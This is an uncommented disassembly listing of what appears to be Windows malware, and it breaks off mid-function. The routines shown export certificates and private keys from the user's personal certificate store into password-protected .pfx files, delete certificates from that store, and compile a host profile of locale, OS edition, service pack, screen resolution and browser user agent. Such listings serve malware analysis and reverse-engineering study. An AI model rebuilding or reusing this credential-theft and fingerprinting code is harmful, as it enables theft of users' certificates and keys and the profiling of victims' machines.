lea edx, [ebp+pszNameString]
push edx ; pszNameString
push 0 ; pvTypePara
push 0 ; dwFlags
push 4 ; dwType
mov eax, [ebp+pCertContext]
push eax ; pCertContext
call ds:CertGetNameStringA
test eax, eax
jz loc_1000E85C
push 0 ; pvPara
push 2000h ; dwFlags
push 0 ; hCryptProv
push 0 ; dwEncodingType
push 2 ; lpszStoreProvider
call ds:CertOpenStore
mov [ebp+hStore], eax
push 0 ; ppStoreContext
push 1 ; dwAddDisposition
mov ecx, [ebp+pCertContext]
push ecx ; pCertContext
mov edx, [ebp+hStore]
push edx ; hCertStore
call ds:CertAddCertificateContextToStore
push 4 ; dwFlags
push 0 ; pvReserved
mov eax, [ebp+szPassword]
push eax ; szPassword
lea ecx, [ebp+Dst]
push ecx ; pPFX
mov edx, [ebp+hStore]
push edx ; hStore
call ds:PFXExportCertStoreEx
cmp [ebp+Dst], 0
jz short loc_1000E7FC
mov eax, [ebp+Dst]
push eax ; cbSize
call ds:CryptMemAlloc
mov [ebp+lpBuffer], eax
push 4 ; dwFlags
push 0 ; pvReserved
mov ecx, [ebp+szPassword]
push ecx ; szPassword
lea edx, [ebp+Dst]
push edx ; pPFX
mov eax, [ebp+hStore]
push eax ; hStore
call ds:PFXExportCertStoreEx
loc_1000E7FC: ; CODE XREF: sub_1000E66B+166�j
lea ecx, [ebp+pszNameString]
push ecx
call sub_1000116E
add esp, 4
lea edx, [ebp+String2]
push edx ; lpString2
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea ecx, [ebp+pszNameString]
push ecx ; lpString2
lea edx, [ebp+FileName]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
push offset a_pfx_1 ; ".pfx"
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+FileName]
push ecx ; lpFileName
mov edx, [ebp+lpBuffer]
push edx ; lpBuffer
mov eax, [ebp+Dst]
push eax ; nNumberOfBytesToWrite
call sub_1000E615
add esp, 0Ch
loc_1000E85C: ; CODE XREF: sub_1000E66B+10F�j
jmp loc_1000E732
; ---------------------------------------------------------------------------
loc_1000E861: ; CODE XREF: sub_1000E66B+C2�j
; sub_1000E66B+E8�j
pop edi
mov esp, ebp
pop ebp
retn
sub_1000E66B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000E866(char *Str2)
sub_1000E866 proc near ; CODE XREF: sub_1000B7EF+B89�p
hCertStore = dword ptr -108h
pCertContext = dword ptr -104h
Str1 = byte ptr -100h
Str2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov [ebp+hCertStore], 0
mov [ebp+pCertContext], 0
push offset aMy_1 ; "MY"
push 10000h ; dwFlags
push 0 ; hCryptProv
push 0 ; dwEncodingType
push 0Ah ; lpszStoreProvider
call ds:CertOpenStore
mov [ebp+hCertStore], eax
cmp [ebp+hCertStore], 0
jnz short loc_1000E8AD
jmp loc_1000E954
; ---------------------------------------------------------------------------
loc_1000E8AD: ; CODE XREF: sub_1000E866+40�j
; sub_1000E866:loc_1000E940�j
mov eax, [ebp+pCertContext]
push eax ; pPrevCertContext
mov ecx, [ebp+hCertStore]
push ecx ; hCertStore
call ds:CertEnumCertificatesInStore
mov [ebp+pCertContext], eax
cmp [ebp+pCertContext], 0
jz short loc_1000E945
push 80h ; cchNameString
lea edx, [ebp+Str1]
push edx ; pszNameString
push 0 ; pvTypePara
push 0 ; dwFlags
push 4 ; dwType
mov eax, [ebp+pCertContext]
push eax ; pCertContext
call ds:CertGetNameStringA
test eax, eax
jz short loc_1000E940
cmp [ebp+Str2], 0
jz short loc_1000E929
mov ecx, [ebp+Str2]
push ecx ; Str2
lea edx, [ebp+Str1]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000E927
mov eax, [ebp+pCertContext]
push eax ; pCertContext
call ds:CertDeleteCertificateFromStore
mov [ebp+pCertContext], 0
loc_1000E927: ; CODE XREF: sub_1000E866+A8�j
jmp short loc_1000E940
; ---------------------------------------------------------------------------
loc_1000E929: ; CODE XREF: sub_1000E866+91�j
mov ecx, [ebp+pCertContext]
push ecx ; pCertContext
call ds:CertDeleteCertificateFromStore
mov [ebp+pCertContext], 0
loc_1000E940: ; CODE XREF: sub_1000E866+8B�j
; sub_1000E866:loc_1000E927�j
jmp loc_1000E8AD
; ---------------------------------------------------------------------------
loc_1000E945: ; CODE XREF: sub_1000E866+68�j
push 1 ; dwFlags
mov edx, [ebp+hCertStore]
push edx ; hCertStore
call ds:CertCloseStore
loc_1000E954: ; CODE XREF: sub_1000E866+42�j
mov esp, ebp
pop ebp
retn
sub_1000E866 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 108h
push offset aSecur32_dll ; "Secur32.dll"
lea eax, [ebp-104h]
push eax
call strcpy ; strcpy
add esp, 8
lea ecx, [ebp-104h]
push ecx
call ds:LoadLibraryA ; LoadLibraryA
mov dword_10073A10, eax
cmp dword_10073A10, 0
jnz short loc_1000E994
xor eax, eax
jmp short loc_1000E9D6
; ---------------------------------------------------------------------------
loc_1000E994: ; CODE XREF: .text:1000E98E�j
push offset aInitsecurityin ; "InitSecurityInterfaceA"
mov edx, dword_10073A10
push edx
call ds:GetProcAddress ; GetProcAddress
mov [ebp-108h], eax
cmp dword ptr [ebp-108h], 0
jnz short loc_1000E9B9
xor eax, eax
jmp short loc_1000E9D6
; ---------------------------------------------------------------------------
loc_1000E9B9: ; CODE XREF: .text:1000E9B3�j
call dword ptr [ebp-108h]
mov dword_100739C0, eax
cmp dword_100739C0, 0
jnz short loc_1000E9D1
xor eax, eax
jmp short loc_1000E9D6
; ---------------------------------------------------------------------------
loc_1000E9D1: ; CODE XREF: .text:1000E9CB�j
mov eax, 1
loc_1000E9D6: ; CODE XREF: .text:1000E992�j
; .text:1000E9B7�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, dword_10073A10
push eax
call ds:FreeLibrary ; FreeLibrary
mov dword_10073A10, 0
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000EA00 proc near ; CODE XREF: TimerFunc+D7�p
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E468
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_2C], ecx
mov eax, [ebp+var_2C]
mov dword ptr [eax], offset off_1001E460
mov ecx, [ebp+var_2C]
mov byte ptr [ecx+4], 1
push 0
push 0
push 0
lea ecx, [ebp+var_28]
call sub_1000EAC0
mov [ebp+var_4], 0
push 0
lea edx, [ebp+var_28]
push edx
mov eax, [ebp+var_2C]
add eax, 8
push eax
call j_GdiplusStartup_thunk
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_1000EA80
; ---------------------------------------------------------------------------
loc_1000EA69: ; DATA XREF: .rdata:1001E46C�o
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_1000EA6F: ; DATA XREF: .rdata:1001E470�o
mov esp, [ebp+var_18]
mov ecx, [ebp+var_2C]
mov byte ptr [ecx+4], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_1000EA80: ; CODE XREF: sub_1000EA00+67�j
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_1000EA00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000EA94 proc near ; CODE XREF: TimerFunc+46C�p
; sub_1000EB00+A�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_1001E460
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx+4]
test edx, edx
jz short loc_1000EABC
mov eax, [ebp+var_4]
mov ecx, [eax+8]
push ecx
call j_GdiplusShutdown_thunk
loc_1000EABC: ; CODE XREF: sub_1000EA94+1A�j
mov esp, ebp
pop ebp
retn
sub_1000EA94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000EAC0 proc near ; CODE XREF: sub_1000EA00+42�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 1
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+4], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax+8], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_8]
mov [edx+0Ch], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 0Ch
sub_1000EAC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000EB00 proc near ; DATA XREF: .rdata:off_1001E460�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000EA94
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_1000EB25
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_1000EB25: ; CODE XREF: sub_1000EB00+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000EB00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000EB30(char *lpString1)
sub_1000EB30 proc near ; CODE XREF: sub_10010623+33�p
var_258 = dword ptr -258h
phkResult = dword ptr -254h
var_250 = dword ptr -250h
cbData = dword ptr -24Ch
hKey = dword ptr -248h
Data = byte ptr -244h
var_1F4 = dword ptr -1F4h
String2 = byte ptr -1F0h
Dst = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = dword ptr -190h
String1 = byte ptr -18Ch
var_108 = dword ptr -108h
LCData = byte ptr -104h
var_4 = dword ptr -4
lpString1 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 258h
mov [ebp+cbData], 50h
push 0FFh ; cchData
lea eax, [ebp+LCData]
push eax ; lpLCData
push 1001h ; LCType
push 400h ; Locale
call ds:GetLocaleInfoA ; GetLocaleInfoA
push 190h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
lea ecx, [ebp+LCData]
push ecx
push offset aUserLocaleSSys ; "User Locale: %s\r\n System: "
mov edx, [ebp+lpString1]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 9Ch ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+Dst], 9Ch
lea ecx, [ebp+Dst]
push ecx ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
mov [ebp+var_1F4], eax
cmp [ebp+var_1F4], 0
jnz short loc_1000EBE7
mov [ebp+Dst], 94h
lea edx, [ebp+Dst]
push edx ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
test eax, eax
jnz short loc_1000EBE7
xor eax, eax
jmp loc_1000F133
; ---------------------------------------------------------------------------
loc_1000EBE7: ; CODE XREF: sub_1000EB30+93�j
; sub_1000EB30+AE�j
mov eax, [ebp+var_190]
mov [ebp+var_258], eax
cmp [ebp+var_258], 2
jz short loc_1000EC01
jmp loc_1000F064
; ---------------------------------------------------------------------------
loc_1000EC01: ; CODE XREF: sub_1000EB30+CA�j
cmp [ebp+var_19C], 5
jnz short loc_1000EC22
cmp [ebp+var_198], 2
jnz short loc_1000EC22
push offset aMicrosoftWindo ; "Microsoft Windows Server 2003, "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EC22: ; CODE XREF: sub_1000EB30+D8�j
; sub_1000EB30+E1�j
cmp [ebp+var_19C], 5
jnz short loc_1000EC43
cmp [ebp+var_198], 1
jnz short loc_1000EC43
push offset aMicrosoftWin_0 ; "Microsoft Windows XP "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EC43: ; CODE XREF: sub_1000EB30+F9�j
; sub_1000EB30+102�j
cmp [ebp+var_19C], 5
jnz short loc_1000EC64
cmp [ebp+var_198], 0
jnz short loc_1000EC64
push offset aMicrosoftWin_1 ; "Microsoft Windows 2000 "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EC64: ; CODE XREF: sub_1000EB30+11A�j
; sub_1000EB30+123�j
cmp [ebp+var_19C], 4
ja short loc_1000EC7C
push offset aMicrosoftWin_2 ; "Microsoft Windows NT "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EC7C: ; CODE XREF: sub_1000EB30+13B�j
cmp [ebp+var_1F4], 0
jz loc_1000EE55
mov edx, [ebp-106h]
and edx, 0FFh
cmp edx, 1
jnz short loc_1000ECEF
cmp [ebp+var_19C], 4
jnz short loc_1000ECB4
push offset aWorkstation4_0 ; "Workstation 4.0 "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000ECEA
; ---------------------------------------------------------------------------
loc_1000ECB4: ; CODE XREF: sub_1000EB30+171�j
mov ecx, [ebp+var_108]
and ecx, 0FFFFh
and ecx, 200h
test ecx, ecx
jz short loc_1000ECDB
push offset aHomeEdition ; "Home Edition "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000ECEA
; ---------------------------------------------------------------------------
loc_1000ECDB: ; CODE XREF: sub_1000EB30+198�j
push offset aProfessional ; "Professional "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000ECEA: ; CODE XREF: sub_1000EB30+182�j
; sub_1000EB30+1A9�j
jmp loc_1000EE50
; ---------------------------------------------------------------------------
loc_1000ECEF: ; CODE XREF: sub_1000EB30+168�j
mov ecx, [ebp+var_108+2]
and ecx, 0FFh
cmp ecx, 3
jz short loc_1000ED15
mov edx, [ebp+var_108+2]
and edx, 0FFh
cmp edx, 2
jnz loc_1000EE50
loc_1000ED15: ; CODE XREF: sub_1000EB30+1CE�j
cmp [ebp+var_19C], 5
jnz loc_1000EDB1
cmp [ebp+var_198], 2
jnz loc_1000EDB1
mov eax, [ebp+var_108]
and eax, 0FFFFh
and eax, 80h
test eax, eax
jz short loc_1000ED54
push offset aDatacenterEdit ; "Datacenter Edition "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EDAC
; ---------------------------------------------------------------------------
loc_1000ED54: ; CODE XREF: sub_1000EB30+211�j
mov edx, [ebp+var_108]
and edx, 0FFFFh
and edx, 2
test edx, edx
jz short loc_1000ED78
push offset aEnterpriseEdit ; "Enterprise Edition "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EDAC
; ---------------------------------------------------------------------------
loc_1000ED78: ; CODE XREF: sub_1000EB30+235�j
mov ecx, [ebp+var_108]
and ecx, 0FFFFh
cmp ecx, 400h
jnz short loc_1000ED9D
push offset aWebEdition ; "Web Edition "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EDAC
; ---------------------------------------------------------------------------
loc_1000ED9D: ; CODE XREF: sub_1000EB30+25A�j
push offset aStandardEditio ; "Standard Edition "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EDAC: ; CODE XREF: sub_1000EB30+222�j
; sub_1000EB30+246�j ...
jmp loc_1000EE50
; ---------------------------------------------------------------------------
loc_1000EDB1: ; CODE XREF: sub_1000EB30+1EC�j
; sub_1000EB30+1F9�j
cmp [ebp+var_19C], 5
jnz short loc_1000EE1E
cmp [ebp+var_198], 0
jnz short loc_1000EE1E
mov ecx, [ebp+var_108]
and ecx, 0FFFFh
and ecx, 80h
test ecx, ecx
jz short loc_1000EDEA
push offset aDatacenterServ ; "Datacenter Server "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EE1C
; ---------------------------------------------------------------------------
loc_1000EDEA: ; CODE XREF: sub_1000EB30+2A7�j
mov eax, [ebp+var_108]
and eax, 0FFFFh
and eax, 2
test eax, eax
jz short loc_1000EE0D
push offset aAdvancedServer ; "Advanced Server "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EE1C
; ---------------------------------------------------------------------------
loc_1000EE0D: ; CODE XREF: sub_1000EB30+2CA�j
push offset aServer_0 ; "Server "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EE1C: ; CODE XREF: sub_1000EB30+2B8�j
; sub_1000EB30+2DB�j
jmp short loc_1000EE50
; ---------------------------------------------------------------------------
loc_1000EE1E: ; CODE XREF: sub_1000EB30+288�j
; sub_1000EB30+291�j
mov eax, [ebp+var_108]
and eax, 0FFFFh
and eax, 2
test eax, eax
jz short loc_1000EE41
push offset aServer4_0Enter ; "Server 4.0, Enterprise Edition "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
jmp short loc_1000EE50
; ---------------------------------------------------------------------------
loc_1000EE41: ; CODE XREF: sub_1000EB30+2FE�j
push offset aServer4_0 ; "Server 4.0 "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EE50: ; CODE XREF: sub_1000EB30:loc_1000ECEA�j
; sub_1000EB30+1DF�j ...
jmp loc_1000EF6D
; ---------------------------------------------------------------------------
loc_1000EE55: ; CODE XREF: sub_1000EB30+153�j
lea eax, [ebp+hKey]
push eax ; phkResult
push 1 ; samDesired
push 0 ; ulOptions
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Produc"...
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_1000EE80
xor eax, eax
jmp loc_1000F133
; ---------------------------------------------------------------------------
loc_1000EE80: ; CODE XREF: sub_1000EB30+347�j
lea ecx, [ebp+cbData]
push ecx ; lpcbData
lea edx, [ebp+String2]
push edx ; lpData
push 0 ; lpType
push 0 ; lpReserved
push offset aProducttype ; "ProductType"
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_1000EEB6
cmp [ebp+cbData], 50h
jbe short loc_1000EEBD
loc_1000EEB6: ; CODE XREF: sub_1000EB30+37B�j
xor eax, eax
jmp loc_1000F133
; ---------------------------------------------------------------------------
loc_1000EEBD: ; CODE XREF: sub_1000EB30+384�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
lea edx, [ebp+String2]
push edx ; lpString2
push offset aWinnt ; "WINNT"
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz short loc_1000EEEF
push offset aWorkstation ; "Workstation "
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EEEF: ; CODE XREF: sub_1000EB30+3AE�j
lea ecx, [ebp+String2]
push ecx ; lpString2
push offset aLanmannt ; "LANMANNT"
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz short loc_1000EF14
push offset aServer_1 ; "Server "
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EF14: ; CODE XREF: sub_1000EB30+3D3�j
lea eax, [ebp+String2]
push eax ; lpString2
push offset aServernt ; "SERVERNT"
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz short loc_1000EF39
push offset aAdvancedServ_0 ; "Advanced Server "
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EF39: ; CODE XREF: sub_1000EB30+3F8�j
mov edx, [ebp+var_198]
push edx
mov eax, [ebp+var_19C]
push eax
push offset aD_D ; "%d.%d "
lea ecx, [ebp+Data]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+Data]
push edx ; lpString2
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000EF6D: ; CODE XREF: sub_1000EB30:loc_1000EE50�j
cmp [ebp+var_19C], 4
jnz loc_1000F02A
push offset aServicePack6 ; "Service Pack 6"
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz loc_1000F02A
lea edx, [ebp+phkResult]
push edx ; phkResult
push 1 ; samDesired
push 0 ; ulOptions
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov [ebp+var_250], eax
cmp [ebp+var_250], 0
jnz short loc_1000EFE1
mov eax, [ebp+var_194]
and eax, 0FFFFh
push eax
push offset aServicePack6aB ; "Service Pack 6a (Build %d)\n"
lea ecx, [ebp+Data]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
jmp short loc_1000F00A
; ---------------------------------------------------------------------------
loc_1000EFE1: ; CODE XREF: sub_1000EB30+48C�j
mov edx, [ebp+var_194]
and edx, 0FFFFh
push edx
lea eax, [ebp+String1]
push eax
push offset aSBuildD ; "%s (Build %d)\n"
lea ecx, [ebp+Data]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
loc_1000F00A: ; CODE XREF: sub_1000EB30+4AF�j
lea edx, [ebp+Data]
push edx ; lpString2
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
jmp short loc_1000F064
; ---------------------------------------------------------------------------
loc_1000F02A: ; CODE XREF: sub_1000EB30+444�j
; sub_1000EB30+45E�j
mov edx, [ebp+var_194]
and edx, 0FFFFh
push edx
lea eax, [ebp+String1]
push eax
push offset aSBuildD_0 ; "%s (Build %d)\n"
lea ecx, [ebp+Data]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+Data]
push edx ; lpString2
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000F064: ; CODE XREF: sub_1000EB30+CC�j
; sub_1000EB30+4F8�j
push 1 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
push eax
push 0 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
push eax
push offset aResDxD ; "\nRes: %dx%d"
lea ecx, [ebp+Data]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+Data]
push edx ; lpString2
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 1 ; samDesired
push 0 ; ulOptions
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_100220C4
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_1000F130
lea ecx, [ebp+cbData]
push ecx ; lpcbData
lea edx, [ebp+Data]
push edx ; lpData
push 0 ; lpType
push 0 ; lpReserved
push offset aUserAgent ; "User Agent"
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_1000F123
push offset aUserAgent_0 ; "\r\nUser agent:"
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
lea edx, [ebp+Data]
push edx ; lpString2
mov eax, [ebp+lpString1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
loc_1000F123: ; CODE XREF: sub_1000EB30+5D1�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_1000F130: ; CODE XREF: sub_1000EB30+5A4�j
mov eax, [ebp+lpString1]
loc_1000F133: ; CODE XREF: sub_1000EB30+B2�j
; sub_1000EB30+34B�j ...
mov esp, ebp
pop ebp
retn
sub_1000EB30 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 404h
push esi
push edi
mov dword ptr [ebp-4], 0
mov dword ptr [ebp-400h], 0
mov ecx, 0FEh
xor eax, eax
lea edi, [ebp-3FCh]
rep stosd
push offset aClose_1 ; "close"
mov eax, dword_10034260
mov ecx, [eax+4]
push ecx
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_1000F2A0
loc_1000F17E: ; CODE XREF: .text:1000F29B�j
mov edx, [ebp-4]
cmp dword_10037024[edx*4], 0
jz loc_1000F2A0
cmp dword ptr [ebp-4], 40h
jge loc_1000F2A0
push offset asc_100236CC ; " "
lea eax, [ebp-400h]
push eax
mov ecx, [ebp-4]
mov edx, dword_10037024[ecx*4]
push edx
call sub_100011DC
add esp, 0Ch
mov [ebp-404h], eax
cmp dword ptr [ebp-404h], 0
jle loc_1000F292
mov eax, [ebp+8]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx]
push edx
mov eax, [ebp-400h]
push eax
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_1000F272
mov ecx, [ebp-3FCh]
push ecx
call ds:atoi ; atoi
add esp, 4
mov dword_10073DDC, eax
mov edx, dword_10034260
mov eax, [edx]
push eax
call ds:atoi ; atoi
add esp, 4
cmp dword_10073DDC, eax
jle short loc_1000F250
push 0
call ds:time ; time
add esp, 4
mov esi, eax
sub esi, dword_10073DDC
mov ecx, dword_10034260
mov edx, [ecx+4]
push edx
call ds:atoi ; atoi
add esp, 4
cmp esi, eax
jle short loc_1000F250
mov dword_10073DDC, 0
loc_1000F250: ; CODE XREF: .text:1000F21A�j
; .text:1000F244�j
mov eax, [ebp-400h]
push eax
call ds:free ; free
add esp, 4
mov ecx, [ebp-3FCh]
push ecx
call ds:free ; free
add esp, 4
jmp short loc_1000F2A0
; ---------------------------------------------------------------------------
loc_1000F272: ; CODE XREF: .text:1000F1E7�j
mov edx, [ebp-400h]
push edx
call ds:free ; free
add esp, 4
mov eax, [ebp-3FCh]
push eax
call ds:free ; free
add esp, 4
loc_1000F292: ; CODE XREF: .text:1000F1C5�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
jmp loc_1000F17E
; ---------------------------------------------------------------------------
loc_1000F2A0: ; CODE XREF: .text:1000F178�j
; .text:1000F189�j ...
mov eax, 1
pop edi
pop esi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000F2AB(char *Str, LPCSTR Str2, int)
sub_1000F2AB proc near ; CODE XREF: sub_100100FD+7B�p
; sub_10011E49+112�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
Memory = dword ptr -2Ch
var_4 = dword ptr -4
Str = dword ptr 8
Str2 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 34h
mov [ebp+var_34], 0
mov eax, [ebp+Str2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
cmp eax, 1
jnz short loc_1000F2E1
mov ecx, [ebp+Str2]
push ecx ; Str2
mov edx, [ebp+Str]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
neg eax
sbb eax, eax
inc eax
jmp loc_1000F36E
; ---------------------------------------------------------------------------
loc_1000F2E1: ; CODE XREF: sub_1000F2AB+1A�j
push offset asc_100236D0 ; "*"
lea eax, [ebp+Memory]
push eax ; int
mov ecx, [ebp+Str2]
push ecx ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+var_4], eax
mov [ebp+var_30], 0
jmp short loc_1000F30B
; ---------------------------------------------------------------------------
loc_1000F302: ; CODE XREF: sub_1000F2AB+9B�j
mov edx, [ebp+var_30]
add edx, 1
mov [ebp+var_30], edx
loc_1000F30B: ; CODE XREF: sub_1000F2AB+55�j
mov eax, [ebp+var_30]
cmp eax, [ebp+var_4]
jge short loc_1000F348
mov ecx, [ebp+var_30]
mov edx, [ebp+ecx*4+Memory]
push edx ; SubStr
mov eax, [ebp+Str]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000F335
mov ecx, [ebp+var_34]
add ecx, 1
mov [ebp+var_34], ecx
loc_1000F335: ; CODE XREF: sub_1000F2AB+7F�j
mov edx, [ebp+var_30]
mov eax, [ebp+edx*4+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
jmp short loc_1000F302
; ---------------------------------------------------------------------------
loc_1000F348: ; CODE XREF: sub_1000F2AB+66�j
cmp [ebp+arg_8], 0
jnz short loc_1000F361
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_34]
jnz short loc_1000F35D
mov eax, 1
